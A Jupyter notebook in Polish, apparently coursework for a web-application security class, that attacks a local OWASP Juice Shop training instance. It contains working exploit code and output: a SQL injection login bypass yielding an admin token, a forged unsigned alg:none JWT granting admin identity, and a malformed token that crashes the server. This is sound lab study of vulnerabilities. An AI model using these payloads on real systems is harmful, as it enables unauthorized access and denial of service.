# Testy penetracyjne podstawowych podatności Juice Shop
Tworzone na podstawie zajęć wchodzących w skład kursu Bezpieczeństwo Aplikacji Internetowych i Mobilnych

# Przygotowanie środowiska

In [85]:
import requests
import json
import base64

url = 'http://localhost:3000'

# 1. Podstawowy SQL Injection

In [ ]:
data = {'email':"' or 1=1;--", 'password':'abc'}
#data = {'email':"xd", 'password':'abc'}
end = '/rest/user/login'
response = requests.post(url+end, data)
code = response.status_code
print(code)
if code == 200:
    print(response.text)
else:
    print(response.text)

200
{"authentication":{"token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiIiLCJlbWFpbCI6ImFkbWluQGp1aWNlLXNoLm9wIiwicGFzc3dvcmQiOiIwMTkyMDIzYTdiYmQ3MzI1MDUxNmYwNjlkZjE4YjUwMCIsInJvbGUiOiJhZG1pbiIsImRlbHV4ZVRva2VuIjoiIiwibGFzdExvZ2luSXAiOiIiLCJwcm9maWxlSW1hZ2UiOiJhc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHRBZG1pbi5wbmciLCJ0b3RwU2VjcmV0IjoiIiwiaXNBY3RpdmUiOnRydWUsImNyZWF0ZWRBdCI6IjIwMjUtMDMtMTIgMTA6NDQ6MjQuNTcyICswMDowMCIsInVwZGF0ZWRBdCI6IjIwMjUtMDMtMTIgMTA6NDQ6MjQuNTcyICswMDowMCIsImRlbGV0ZWRBdCI6bnVsbH0sImlhdCI6MTc0MTc3ODY1Mn0.zPXADRB4PBljyfItoObmu7mDHdYu2ZTJ1as4yZfcHzC6Kw7QfAfNdSNqVjccRd7rR-gS-nUUE_OVIVEZocmosglqZiAmcqmujFQUn0wFjK0tsl00NSBS_4H72kkyb7fOW3xfdy9lRIoo1t8r90NTbWsHl7Ee8rfGu2FOCgYYMgU","bid":1,"umail":"admin@juice-sh.op"}}


# 2. Manipulacje tokenami 

## Sprawność endpointu

In [32]:
token = "eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MjIsInVzZXJuYW1lIjoiIiwiZW1haWwiOiJmaWxpcEBtYWlsLmNvbSIsInBhc3N3b3JkIjoiM2EzMGUwOGMxYThiODgzODZkOTg0ZTc3MDhmZWU3MWUiLCJyb2xlIjoiY3VzdG9tZXIiLCJkZWx1eGVUb2tlbiI6IiIsImxhc3RMb2dpbklwIjoiMC4wLjAuMCIsInByb2ZpbGVJbWFnZSI6Ii9hc3NldHMvcHVibGljL2ltYWdlcy91cGxvYWRzL2RlZmF1bHQuc3ZnIiwidG90cFNlY3JldCI6IiIsImlzQWN0aXZlIjp0cnVlLCJjcmVhdGVkQXQiOiIyMDI1LTAzLTEyIDExOjQ0OjUyLjc2NiArMDA6MDAiLCJ1cGRhdGVkQXQiOiIyMDI1LTAzLTEyIDExOjQ0OjUyLjc2NiArMDA6MDAiLCJkZWxldGVkQXQiOm51bGx9LCJpYXQiOjE3NDE3Nzk5MDV9.LFXHExQRmgANcXQEkf7Q8gNYlBCT5QBOizCPFZCSOGDo-WeGIS5v6beQ64u-dHtir1t1QnE6l9e5kZbu7d1iAHRGcWNB7YnFrr22agWTcwyBuVDk_bT5LAA7wEOgQ7b4sCyfkEaaV6LNxYtslrwg5fa3kwYfnRnnvOkprPpXa3Q"
data = {"action":"setname","query":"Carl"}
end = '/rest/chatbot/respond'
headers = {"Authentication": "Bearer " + token}
cookies = {'token':token}
response = requests.post(url+end, data, headers=headers, cookies=cookies)
code = response.status_code
print(code)

200


## Alg: none

Token został tak zmodyfikowany, aby przekazywać fałszywe dane i nie posiadać podpisu

In [ ]:
token_data = {"status":"success","data":{"id":22,"username":"","email":"filip@mail.com","password":"3a30e08c1a8b88386d984e7708fee71e","role":"customer","deluxeToken":"","lastLoginIp":"0.0.0.0","profileImage":"/assets/public/images/uploads/default.svg","totpSecret":"","isActive":True,"createdAt":"2025-03-12 11:44:52.766 +00:00","updatedAt":"2025-03-12 11:44:52.766 +00:00","deletedAt":None},"iat":1741779905}
token_header = {"typ":"JWT","alg":"none"}

#Dowolna modyfikacja - dla admin = 1
token_data['data']['id'] = 1

header_encoded = base64.b64encode(json.dumps(token_header).encode()).decode().strip('=')
data_encoded = base64.b64encode(json.dumps(token_data).encode()).decode().strip('=')

token = header_encoded + '.' + data_encoded + '.'

print("Sending: ", token)

data = {"action":"setname","query":"Carl"}
end = '/rest/chatbot/respond'
headers = {"Authentication": "Bearer " + token}
cookies = {'token':token}
response = requests.post(url+end, data, headers=headers, cookies=cookies)
code = response.status_code
print(code)
print(response.text)


#Dodany nadmiarowy padding na wszelki wypadek 
#https://stackoverflow.com/questions/2941995/python-ignore-incorrect-padding-error-when-base64-decoding
received_token_data = json.loads(base64.b64decode(response.json()['token'].split('.')[1] + '==========').decode())

print(received_token_data)

if received_token_data['data']['email'] == 'admin@juice-sh.op':
    print("PASSED")


Sending:  eyJ0eXAiOiAiSldUIiwgImFsZyI6ICJub25lIn0.eyJzdGF0dXMiOiAic3VjY2VzcyIsICJkYXRhIjogeyJpZCI6IDEsICJ1c2VybmFtZSI6ICIiLCAiZW1haWwiOiAiZmlsaXBAbWFpbC5jb20iLCAicGFzc3dvcmQiOiAiM2EzMGUwOGMxYThiODgzODZkOTg0ZTc3MDhmZWU3MWUiLCAicm9sZSI6ICJjdXN0b21lciIsICJkZWx1eGVUb2tlbiI6ICIiLCAibGFzdExvZ2luSXAiOiAiMC4wLjAuMCIsICJwcm9maWxlSW1hZ2UiOiAiL2Fzc2V0cy9wdWJsaWMvaW1hZ2VzL3VwbG9hZHMvZGVmYXVsdC5zdmciLCAidG90cFNlY3JldCI6ICIiLCAiaXNBY3RpdmUiOiB0cnVlLCAiY3JlYXRlZEF0IjogIjIwMjUtMDMtMTIgMTE6NDQ6NTIuNzY2ICswMDowMCIsICJ1cGRhdGVkQXQiOiAiMjAyNS0wMy0xMiAxMTo0NDo1Mi43NjYgKzAwOjAwIiwgImRlbGV0ZWRBdCI6IG51bGx9LCAiaWF0IjogMTc0MTc3OTkwNX0.
200
{"action":"response","body":"Nice to meet you Carl, I'm Juicy","token":"eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJzdGF0dXMiOiJzdWNjZXNzIiwiZGF0YSI6eyJpZCI6MSwidXNlcm5hbWUiOiJDYXJsIiwiZW1haWwiOiJhZG1pbkBqdWljZS1zaC5vcCIsInBhc3N3b3JkIjoiMDE5MjAyM2E3YmJkNzMyNTA1MTZmMDY5ZGYxOGI1MDAiLCJyb2xlIjoiYWRtaW4iLCJkZWx1eGVUb2tlbiI6IiIsImxhc3RMb2dpbklwIjoiIiwicHJvZmlsZUltYWdlIjoiYXNzZXRzL3B1

## Zamiana alg. na HS
TODO

## Wywołanie błędu cannor read properties of null w jws.decode

UWAGA! Odcina serwer!

B:\prg\L25\baim\BAIM_JuiceShop_25L\node_modules\jsonwebtoken\index.js:4
  return jws.decode(jwt).payload;
                        ^

TypeError: Cannot read properties of null (reading 'payload')

In [ ]:
RUN = False
if (RUN):
    token_header = {"typ":"JWT","alg":"none"}
    token_data['data']['id'] = 1
    header_encoded = base64.b64encode(json.dumps(token_header).encode()).decode().strip('=')
    
    #Token bez danych
    token = header_encoded + '.'  + '.'
    
    data = {"action":"setname","query":"Carl"}
    end = '/rest/chatbot/respond'
    headers = {"Authentication": "Bearer " + token}
    cookies = {'token':token}
    response = requests.post(url+end, data, headers=headers, cookies=cookies)
    code = response.status_code
    print(code)